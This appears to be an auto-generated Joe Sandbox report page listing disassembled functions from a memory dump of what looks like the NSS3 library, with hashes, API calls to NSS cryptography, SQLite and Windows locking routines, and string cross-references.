Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
String ID:
API String ID: 1183590942-0
Opcode ID: d1c8647a2b396f2420ae573e9b6d05e848a7eac79180a99c76b0d756512ecbcf
Instruction ID: 54de732ebb0f07ca57c3b2d321cbe2468480abf3d554e158de2891dcf763260f
Opcode Fuzzy Hash: d1c8647a2b396f2420ae573e9b6d05e848a7eac79180a99c76b0d756512ecbcf
Instruction Fuzzy Hash: 7A61AEB1A006049FEB30CF68D984B9AB7F5FF99308F554928E8459BA51E734F908CB80

Function 6C784420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C784444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C784466

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784494

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: 29a450cdec4e70cd1db89e44e1831ded9debb43bfe88a6228445bfb2f2516c91
Instruction ID: 4e816a0ce0142ddca44e7d2bd64030402f68d7955d1b5bd52f62be1eac6c5395
Opcode Fuzzy Hash: 29a450cdec4e70cd1db89e44e1831ded9debb43bfe88a6228445bfb2f2516c91
Instruction Fuzzy Hash: FD11C3B2D017059BD7208F659D844A7B7F8FF59218B044B3EE99E52A00F371B5988791

Function 6C88CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88D086
PR_Malloc.NSS3(00000001), ref: 6C88D0B9
PR_Free.NSS3(?), ref: 6C88D138

Strings

>, xrefs: 6C88CF5B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 896a363789ded3f1197fe71c9c1d172e37bdf826f34d88746e70514c46a1bf0d
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 50D17F26B4354B4BFB34587C8EA13D9B7938B42374F584B2BD5218BFEAE6198843C351

Function 6C82AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d80669e2d6c93919d21cbe2510f36273f1288ba8d4599a6bde9fa3de6f6bda7
Instruction ID: fb9b44df4fd5ee51168c64683cace25be7ecd3059c00ac6223fe351011d8938a
Opcode Fuzzy Hash: 4d80669e2d6c93919d21cbe2510f36273f1288ba8d4599a6bde9fa3de6f6bda7
Instruction Fuzzy Hash: 9AF1C071E021558BEB34CF28DA557AA77F0BB8A308F15463DC906D7740E778AA95CBC0

Function 6C7E0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C7E1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C7E1086

Strings

h(~l, xrefs: 6C7E1062, 6C7E105D, 6C7E0F37, 6C7E1081, 6C7E1082
h(~l, xrefs: 6C7E0E55, 6C7E0EC4, 6C7E0F3A, 6C7E0FA7

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(~l$h(~l
API String ID: 1297977491-3782546141
Opcode ID: 8810c631849fd125c2f3e8650083e65db5083992d23e313ea42d9acc8c83f728
Instruction ID: 39f3364e6b4d4d6130b8c76b1be44e8ce54757e8364e44ef870a9cec64ae9336
Opcode Fuzzy Hash: 8810c631849fd125c2f3e8650083e65db5083992d23e313ea42d9acc8c83f728
Instruction Fuzzy Hash: F5A13D72B0125A9FDB08CF99C994AEEB7B6BF8C314B148139E915A7701DB35EC11CB90

Function 6C8025B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6C7E5A85), ref: 6C802675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C802659

Part of subcall function 6C7B3850: TlsGetValue.KERNEL32 ref: 6C7B389F
Part of subcall function 6C7B3850: EnterCriticalSection.KERNEL32(?), ref: 6C7B38B3
Part of subcall function 6C7B3850: PR_Unlock.NSS3(?), ref: 6C7B38F1
Part of subcall function 6C7B3850: TlsGetValue.KERNEL32 ref: 6C7B390F
Part of subcall function 6C7B3850: EnterCriticalSection.KERNEL32(?), ref: 6C7B3923
Part of subcall function 6C7B3850: PR_Unlock.NSS3(?), ref: 6C7B3972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6C7E5A85,?,6C7E5A85), ref: 6C802717

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: 92cd856fc8169277a55d9adc343e222a79a67d40c4302a19e731af4b8a10f49d
Instruction ID: 8b34c9ce7351b3521549630939451d2a9021236ddc17893cc11bf51044fe20c4
Opcode Fuzzy Hash: 92cd856fc8169277a55d9adc343e222a79a67d40c4302a19e731af4b8a10f49d
Instruction Fuzzy Hash: 03412871B093846AFB318E18CD89FDB73ACEFC0718F104919E96406641EBB5998487D3

Function 6C758540 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 782COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000011C,automatic index on %s(%s),?,00000001), ref: 6C758705

Strings

automatic index on %s(%s), xrefs: 6C7586FB
BINARY, xrefs: 6C758B02, 6C758DA2, 6C758E27, 6C758E60

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: BINARY$automatic index on %s(%s)
API String ID: 632333372-611788421
Opcode ID: 1836f8aa41d069601b141f7765bb4adf9c2a8b1b87cf9288d82cb5b7e2516b7b
Instruction ID: 792e2fe92db09d3139bf409087da0daf1af7ee5c6d00c1f9f79ac7b6a8cd89bd
Opcode Fuzzy Hash: 1836f8aa41d069601b141f7765bb4adf9c2a8b1b87cf9288d82cb5b7e2516b7b
Instruction Fuzzy Hash: D762A074A183419FD705CF28C580B1AB7F1FF89348F548A6EE8899B752DB31E856CB81

Function 6C7464D0 Relevance: 5.7, Strings: 4, Instructions: 724COMMON

Download Yara Rule

Strings

authorizer malfunction, xrefs: 6C746E3E
WBql, xrefs: 6C74655C
WBql, xrefs: 6C74679E
not authorized, xrefs: 6C746D47, 6C746D4C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: WBql$WBql$authorizer malfunction$not authorized
API String ID: 0-3509725271
Opcode ID: 9fa8a60459f993fdc02eb34d01bdac57d0c172e1b12c1677ee0d1be820277aee
Instruction ID: 940bd28822a395a4d4e9a24433cbdb92e25d3075a8dfe0f77b09bbb50f705168
Opcode Fuzzy Hash: 9fa8a60459f993fdc02eb34d01bdac57d0c172e1b12c1677ee0d1be820277aee
Instruction Fuzzy Hash: 73626E70A04204CFDB14CF29C584AA9BBF2FF89308F25C1ADD9159B766D736E956CB80

Function 6C706F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C70702B
sz=[0-9]*, xrefs: 6C707049
*?[, xrefs: 6C707034, 6C707052, 6C707070
noskipscan*, xrefs: 6C707067

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: bf146ed8872dc92a3ac4071ffb9920fcd4b9e184cdf519d57f1b341e6e87e5e8
Instruction ID: 0805549e97300d8daf0e0a06d05caf3e1aa3fa30fc0a9731ab087312363ee06f
Opcode Fuzzy Hash: bf146ed8872dc92a3ac4071ffb9920fcd4b9e184cdf519d57f1b341e6e87e5e8
Instruction Fuzzy Hash: 8B718BF2F002154BEB248A6CCA9039E73E29F81354F294339CD69ABBD3D6719D4687D1

Function 6C79EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C79F0F9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 695312eba94fb1bc17efd15af4b0791ba30f17ada78c92e8d72c98454beba451
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: DC91B071E0061A8BCB14CF68D9906AEB7F1FF85324F24462DE926A7BC1D730A905CB90

Function 6C7C2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C7E7929), ref: 6C7C2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C7E7929), ref: 6C7C2FE0

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: c2d8f9844c5c9ded069efae989610508132f48daa2c21d78b5b2c8924c3f03e7
Instruction ID: 5d77cb985be534154fde0da4b42f05ee295af70386b9191af1de190d9e5d91c2
Opcode Fuzzy Hash: c2d8f9844c5c9ded069efae989610508132f48daa2c21d78b5b2c8924c3f03e7
Instruction Fuzzy Hash: 9E51D272B049178FD7108E59CA84BEA73B2FB45318F254179DD099BB02D735E986CB83

Function 6C766410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C766401,?,?,0000001C), ref: 6C766422
WSAGetLastError.WSOCK32(?,?,?,?,6C766401,?,?,0000001C), ref: 6C766432

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: 1af705b4eb69e64f8167f39ecd412ced57113f41f58453d2e09d70271def7f08
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 91E01D391511056FDB019F7DDD0485A37959F08368790CD30F939C7E71FA35D5558780

Function 6C70AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C70AE9F
winUnlock, xrefs: 6C70AE18

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 8286ba93b060f0797e5aaa9709bebeb102b51a47fe6cff5740a2a40823797c96
Instruction ID: b6f307c2658bb00a5ad1fa335be71a3a84e4bc92077dec3ec05f55cf95ce56e3
Opcode Fuzzy Hash: 8286ba93b060f0797e5aaa9709bebeb102b51a47fe6cff5740a2a40823797c96
Instruction Fuzzy Hash: 89717F716042409BDB24CF28D895AABBBF5FF89318F14CA29F94997701D730A985CBC1

Function 6C7CED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C7CEE3D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 9127789fb1516fa174b0858e974cf77ea96dade85fc2697538dc131452c94842
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 6E71D372F0170A8FE718CF59CA8166AB7F2BF88304F15862DD85697B91D770E940CB92

Function 6C704DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C705125

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: a137f98c5cbe8beeb1e42170f17fe615672b4328f76c41dbe1d064d65fc2389e
Instruction ID: 31419b0a65a6b9e9e4f61bd551f0552f04fe27ee1a3f85a521c56877684d9f57
Opcode Fuzzy Hash: a137f98c5cbe8beeb1e42170f17fe615672b4328f76c41dbe1d064d65fc2389e
Instruction Fuzzy Hash: AEE14DB0A183408FDB54DF28D585A5ABBF0FF89308F15862DF89997351E730A985CBC2

Function 6C7246D0 Relevance: 1.0, Instructions: 958COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe1788dfdfcc05cd98ce3f9bd86817eb1c27f9a7d4bfccf69424fd963ebae6e
Instruction ID: bacf182fb2024699114d2b498b9a5531b8015de337693d7bf5c24a78f39b89d2
Opcode Fuzzy Hash: 8fe1788dfdfcc05cd98ce3f9bd86817eb1c27f9a7d4bfccf69424fd963ebae6e
Instruction Fuzzy Hash: BC92B274A00205CFCB15CF58C590AAABBF2FF89308F2982ADC9556B756D735ED42CB90

Function 6C78E5F0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterExitMonitorSectionUnlockValue
String ID:
API String ID: 344640607-0
Opcode ID: 65235b26812c157202067b15c3fc4b7c1ae77b62d513783ce6b2f6431e535716
Instruction ID: 4acd679ece530c0852919a378971c85f6ade2685318f0b72c26b4e72ba898339
Opcode Fuzzy Hash: 65235b26812c157202067b15c3fc4b7c1ae77b62d513783ce6b2f6431e535716
Instruction Fuzzy Hash: 55D1F0B9D026189BEB009F61EA487EE77B5BF4531CF040138E91967B40E735E819CBE2

Function 6C6F45B0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
